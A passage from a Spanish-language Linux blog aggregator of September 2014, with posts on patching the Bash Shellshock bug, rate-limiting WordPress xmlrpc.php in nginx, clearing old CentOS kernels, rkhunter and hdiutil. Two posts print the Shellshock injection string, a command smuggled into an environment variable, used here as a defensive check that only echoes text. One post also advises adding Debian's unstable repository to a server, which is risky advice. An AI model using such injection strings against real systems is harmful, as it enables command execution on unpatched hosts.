> consectetuer adipiscing elit. Aliquam hendrerit mi posuere
> lectus. Vestibulum enim wisi, viverra nec, fringilla in, laoreet
> vitae, risus.

Lists

Again, while Markdown will happily allow you to write things like:

*   Lorem ipsum dolor sit amet, consectetuer adipiscing elit.
Aliquam hendrerit mi posuere lectus. Vestibulum enim wisi,
viverra nec, fringilla in, laoreet vitae, risus.
*   Donec sit amet nisl. Aliquam semper ipsum sit amet velit.
Suspendisse id sem consectetuer libero luctus adipiscing.

You should love your reader, and once again, if you are using something like Emacs, use the fill prefix to render the list like this instead:

*   Lorem ipsum dolor sit amet, consectetuer adipiscing elit.
    Aliquam hendrerit mi posuere lectus. Vestibulum enim wisi,
    viverra nec, fringilla in, laoreet vitae, risus.
*   Donec sit amet nisl. Aliquam semper ipsum sit amet velit.
    Suspendisse id sem consectetuer libero luctus adipiscing.	

Martes 30 de septiembre de 2014

Oswaldo Villa

Oswaldo Villa
Villatux Blog <--

Vulnerabilidad en BASH CVE-2014-6271 "Shellshock"

Les dejo este howto para que actualicen el paquete "bash" ya que tiene la vulnerabilidad  BASH CVE-2014-6271 "Shellshock"   y con ella tu servidor puede ser comprometido y con el toda la información contenida.

Verifica si eres vulnerable
En una terminal ejecuta el siguiente comando:

env x='() { :;}; echo vulnerable' bash -c "esto es una prueba"

Si eres vulnerable te saldrá un mensaje:


vulnerable
esto es una prueba

Si no eres vulnerable te saldrá unicamente:


esto es una prueba

Para actualizar bash primero debes actualizar la lista de paquetes 

apt-get update

y luego actualizar bash

apt-get install --only-upgrade bash

Si no se actualizó bash, es que no tienes correctamente tus repositorios de paquetes.

edita el /etc/apt/sources.list  y agrega el siguiente repo:

deb http://ftp.debian.org/debian sid main contrib non-free

despues e esto vuelve a actualizar bash

Lunes 29 de septiembre de 2014

Planeta Laguna: Limpiar y restaurar una máquina de afeitar

Domingo 28 de septiembre de 2014

Alex Callejas

Bash critical security vulnerability: shellshock

watchmen-rorschach

Por cierto, necesitas una cerradura más resistente, la nueva se ha roto de un sólo empujónRorschach [Watchmen]

El pasado miércoles se descubrió una vulnerabilidad en el intérprete de comandos más utilizado en la mayoría de los sistemas Linux, bash, la vulnerabilidad surge del hecho de que se pueden crear variables de entorno con valores especialmente diseñados antes de llamar a la shell bash. Estas variables pueden contener código que es ejecutado tan pronto como se invoca el shell. El nombre de estas variables no importa, sólo sus contenidos.

Al día de hoy, varios sitios han publicado guías y análisis de esta vulnerabilidad:

IMG_7408

La forma más simple de saber si alguno de nuestros equipos es vulnerable, es ejecutando:

[root@hobbiton ~]# env x='() { :;}; echo OOPS' bash -c /bin/true

Si el comando nos devuelve la cadena OOPS, significa que nuestro equipo es vulnerable y tenemos que actualizar.

Diferentes sitios de varias distribuciones han publicado la actualización correspondiente a esta vulnerabilidad:

Incluso los sistemas OS X también son vulnerables, aquí la guía para aplicar el patch. Update: Aquí las ligas de descarga del patch, según su OS X:

Es muy importante actualizar el paquete porque ya han utilizado la vulnerabilidad para realizar ataques:

Espero les sirva…

Sábado 27 de septiembre de 2014

WordPress xmlrpc DDOS mitigation

Well not long ago DH contacted me with this dreaded message:

Hello,

I’m writing you about your domain:

foo.bar

Specifically the file:

xmlrpc.php

This file is used for modifying your wordpress install from 3rd party programs, like mobile site designers, desktop client programs, and pretty much anything besides the wordpress control panel under wp-admin.  Bots and hackers have been increasingly attacking these files listed above to try to either brute force into the wordpress installs, or cause other downtime and server issues.  Our security team is working on blocks and protections to prevent these, but in the meantime this is causing server issues and downtime for your site, so our oncall admin has had to disable the file by changing permissions to 200 so it isn’t accessible.  If you don’t use external programs to modify this blog, you likely won’t even notice any chance in behavior and it can remain.  If you do make use of this file, when you next need to use it it can be re-enabled by chmod. If you have further questions please let us know.

This was on august 3… I suppose we where part of a severe DDOS that were targeting third party sites… BTW this was fixed with mod_rewrite hack on .htaccess [1].

Two weeks ago we got report for another site I run, this time on a bigger VPS, that we where participating on an ongoing DDOS [2] that we also caught as our machine resources were drawn terribly.

Yesterday we got visits again, of course we were aware of the problem and originally chmoded 000 the file, dropped via iptables 3 subnets that where hammering it and all was good, but as you can read on several places disabling this file breaks several functions of WordPress [3].

So as we use nginx as front end, begin to investigate if like on apache or lighty could exist something like mod_evasive and indeed exists [2] it’s called  mod_http_limit_req_module so after reading the documentation, I searched for examples and find a very good one that inspired this setup [4] so we ended with the next changes on nginx.conf:

# Prevent DDOS
limit_req_zone $binary_remote_addr zone=one:10m rate=1r/m;

So we are limiting request to 1 request for minute, but as you could imagine we don’t want this for all the site, so next on the site conf we added

location = /xmlrpc.php
{
limit_req zone=one burst=5;
}

So we had 1 connection for minute on this file and a burst of five, but as this guys where hammering at more than one connection per second, well I suspect going to get a lot of 503 messages, I only expect that normal sites and ourselves not need this file more than one time for minute… on the bright side CPU, IO, and other resources are normal now, BTW some better advice if you don’t manage a server but had only access to .htaccess can be found here [1]

Update: 26/10/2014 We ended having to tweak the limiting as WordPress itself uses to connect to the file so we ended limiting ourselves the fix was to change on the first one to limit to  six request per second instead of minute:

# Prevent DDOS
limit_req_zone $binary_remote_addr zone=one:10m rate=6r/s;

And on site config to change for:

location = /xmlrpc.php
{
limit_req zone=one burst=7 nodelay;
}

As the docs says if you want no delay you had to add and also thinking that most modern browsers make up to 16 simultaneous connections [6] we upped the number but we don’t expect to have 16 request per second to this file.

[1]https://wordpress.org/support/topic/resolving-xmlrpcphp-ddos-attack-with-htaccess-redirect
[2] http://blog.sucuri.net/2014/03/more-than-162000-wordpress-sites-used-for-distributed-denial-of-service-attack.html
[3] https://wordpress.org/support/topic/xmlrpcphp-attack-on-wordpress-38
[4] http://nginx.org/en/docs/http/ngx_http_limit_req_module.html
[5] https://cowthink.org/flood-dos-protection-with-limit-req-in-nginx/
[6] http://kb.mozillazine.org/Network.http.max-connections-per-server

Planeta Laguna: CVE-2014-6271 cgi-bin reverse shell

Jueves 25 de septiembre de 2014

Promoviendo Software Libre: Actualizar Bash Fedora 20

CentOS: more space needed on the /boot filesystem.

Mientras estaba actualizando unas dependencias de CentOS me salio el siguiente error:

Install       1 Package(s)

Total download size: 28 M
Installed size: 121 M
Is this ok [y/N]: y
Downloading Packages:
kernel-2.6.32-431.29.2.el6.x86_64.rpm                                    |  28 MB     00:05
Running rpm_check_debug
Running Transaction Test


Transaction Check Error:
  installing package kernel-2.6.32-431.29.2.el6.x86_64 needs 12MB on the /boot filesystem

Error Summary
-------------
Disk Requirements:
  At least 12MB more space needed on the /boot filesystem.

Y efectivamente ya no me quedaba espacio.

root@chiapas$ df -H /boot
Filesystem      Size  Used Avail Use% Mounted on
/dev/md0        102M   79M   18M  82% /boot

Para solucionar esto y poder instalar el nuevo kernel (o las dependencias de este) es necesario borrar los antiguos núcleos:

root@chiapas$ rpm -qa | grep kernel
...
kernel-devel-2.6.32-431.20.3.el6.x86_64
dracut-kernel-004-336.el6_5.2.noarch
..
kernel-devel-2.6.32-431.17.1.el6.x86_64
kernel-2.6.32-431.23.3.el6.x86_64
kernel-2.6.32-431.11.2.el6.x86_64

#Suprimimos los nucleos viejos
root@chiapas$ rpm -e kernel-2.6.32-431.11.2.el6.x86_64
root@chiapas$ rpm -e kernel-2.6.32-431.23.3.el6.x86_64

De esta forma liberamos el espacio y procedemos con la instalación.

Martes 23 de septiembre de 2014

unattended-upgrades

Dpkg::Pre-Invoke {"mount -o remount,exec /tmp";};
DPkg::Post-Invoke {"mount -o remount,noexec /tmp";};

Quick hack as I use a noexec (nosuid, or whichever) /tmp on /etc/apt/apt.conf.d/50unattended-upgrades we need to tell to dpkg to change /tmp or some packages that need pre configuring will fail.

Viernes 19 de septiembre de 2014

José Oviedo

José Oviedo
oviedo.mx

rkhunter: Warnings y más warnings

Estoy escaneando en busca de troyanos y rootkit mi servidor Debian con la aplicación rkhunter, y en el log veo que tengo diferentes warnings en archivos del sistema como por ejemplo:

/usr/sbin/adduser [ Warning ]
/usr/bin/lwp-request [ Warning ]
/bin/which [ Warning ]

Y por ejemplo el adduser el warning indicaba que apuntaba a un archivo de perl , entonces para no ponerme paranoico investigue sobre lo sucedido y veo que falta agregar un parametro en el archivo de configuración de rkhunter: /etc/rkhunter.conf, como estoy utilizando debian (ubuntu) falta agregar esta línea:

PKGMGR=DPKG

Eso indica que las validaciones se harán con dpkg y entonces vualaa! ya no más warnings en estos archivos.

Alex Callejas

Software Freedom Day – CDMX 2014

SDF-Asistire

Los buenos amigos de G3ekArmy  invitan a asistir al Software Freedom Day (Día Mundial del Software Libre), que se celebrará en el TelmexHub, en el centro de la Ciudad. Habrá diferentes actividades educativas sobre los beneficios del uso del Software Libre, así como diferentes talleres para aprender a usar diferentes herramientas y mejorar la experiencia en el uso de otras más.

Pueden dar clic en el cartel para checar todas las actividades que se realizarán:

SFD-G3ekArmy

El único requisito es registrarse, para agilizar el acceso al Hub.

Espero que puedan ser parte de esta celebración, Allá nos vemos! :)

Jueves 18 de septiembre de 2014

Conociendo hdiutil

El programa hdiutil es una utilidad de línea de comandos de Apple para trabajar con imágenes de disco. Las imágenes de disco (por lo general con un .dmg, .img o .iso extensión de archivo) se utilizan a menudo para la distribución de programas y para la grabación de CDs / DVDs.

Convertir de .ISO a .dmg

> [ rafael ] ~/Documents/Isos SO/ovm $ ls -lt
total 508344
-rwxrwxrwx  1 rafael  staff  260270080 Jun 14 15:07 OVM_Server.iso
> [ rafael ] ~/Documents/Isos SO/ovm $ hdiutil convert OVM_Server.iso -format UDRW -o OVM_server.dmg
Leyendo Oracle VM Server cd 1 20140416   (Apple_ISO: 0)…
.........................................................................................
Tiempo transcurrido: 975.031ms
Velocidad: 254.6Mbytes/s
Ahorro: 0.0%
created: /Users/rafael/Documents/Isos SO/ovm/OVM_server.dmg

Convertir de .dmg a .ISO

> [ rafael ] ~/Documents/Isos SO/ovm $ ls
OVM_Server.iso	OVM_server.dmg
> [ rafael ] ~/Documents/Isos SO/ovm $ hdiutil convert OVM_Server.iso -format UDRW -o imagen_ovm_en.dmg
Leyendo Oracle VM Server cd 1 20140416   (Apple_ISO: 0)…
.........................................................................................
Tiempo transcurrido:  1.160s
Velocidad: 213.8Mbytes/s
Ahorro: 0.0%
created: /Users/rafael/Documents/Isos SO/ovm/imagen_ovm_en.dmg
> [ rafael ] ~/Documents/Isos SO/ovm $

Crear un dmg de un folder.

> [ rafael ] ~/Documents/Isos SO $ pwd
/Users/rafael/Documents/Isos SO
> [ rafael ] ~/Documents/Isos SO $ hdiutil create ovm_folders.dmg -srcfolder ovm/
..................................................................................
created: /Users/rafael/Documents/Isos SO/ovm_folders.dmg
> [ rafael ] ~/Documents/Isos SO $ ls -l ovm_folders.dmg
-rw-r--r--@ 1 rafael  staff  718207852 Sep 18 15:14 ovm_folders.dmg
> [ rafael ] ~/Documents/Isos SO $

Montar y desmontar una imagen.

> [ rafael ] ~/Documents/Isos SO $ hdiutil mount test.dmg

> [ rafael ] ~/Documents/Isos SO $ hdiutil unmount /dev/device-name

Crear una imagen encriptada:

> [ rafael ] ~/Documents/Isos SO $ hdiutil create -encryption -size 10m -volname encdata test.dmg -fs HFS+J

Durante la creación de la imagen del disco, te pedirá una contraseña que le permitirá el acceso a los contenidos de la imagen.

Planeta Laguna: Reencarnarán siempre en un recuerdo
Planeta Laguna: La persistencia
Planeta Laguna: Rogar y gemir

Miércoles 17 de septiembre de 2014

Hazzim Anaya

Hazzim Anaya
Unix User...

Vagrant

vagrant up

Martes 16 de septiembre de 2014

LogicalBricks Solutions: Configuración de Vim por proyecto

Jueves 11 de septiembre de 2014

Gerónimo Orozco

Gerónimo Orozco
Patux's booring news

FSL 2014 : El poder detras del sistema - Recepcion de propuestas abierta

El FSL 2014, "El poder detras del sistema" esta a la vuelta de la esquina 30 y 31 de Oct / 1 y 2 de Nov 2014, Puerto Vallarta, Jal.

Este FSL se enfocara a temas de administracion de sistemas, automatizacion y DevOps.

El registro para asistentes y la recepcion de propuestas de ponencias ya estan abiertos.



...nos vemos en Vallarta.
Renich Bon Ciric

HowTo: Change your css according to client’s time

I am no fan of javascript. In fact, I despise it. But, recently, it occured to me that it would be cool to change the CSS theme according to the client’s time.

Here’s how:

function change_css_according_to_time() {
    var d = new Date();
    var h = d.getHours();

    if ( h >= 7 && h <= 19 ) {
        console.log( 'Good day!' );
        document.getElementById("mainStyle").href = '/css/default-day.css';
    } else {
        console.log( 'Good evening!' );
    }
}

change_css_according_to_time()

Demo: http://web2.woralelandia.com/

Check out the default.js. It’s as simple as that.

Also, you just need the VanillaJS framework: http://vanilla-js.com/.

Have fun!

Lunes 08 de septiembre de 2014

Planeta Laguna: Comprando en línea para solucionar problemas.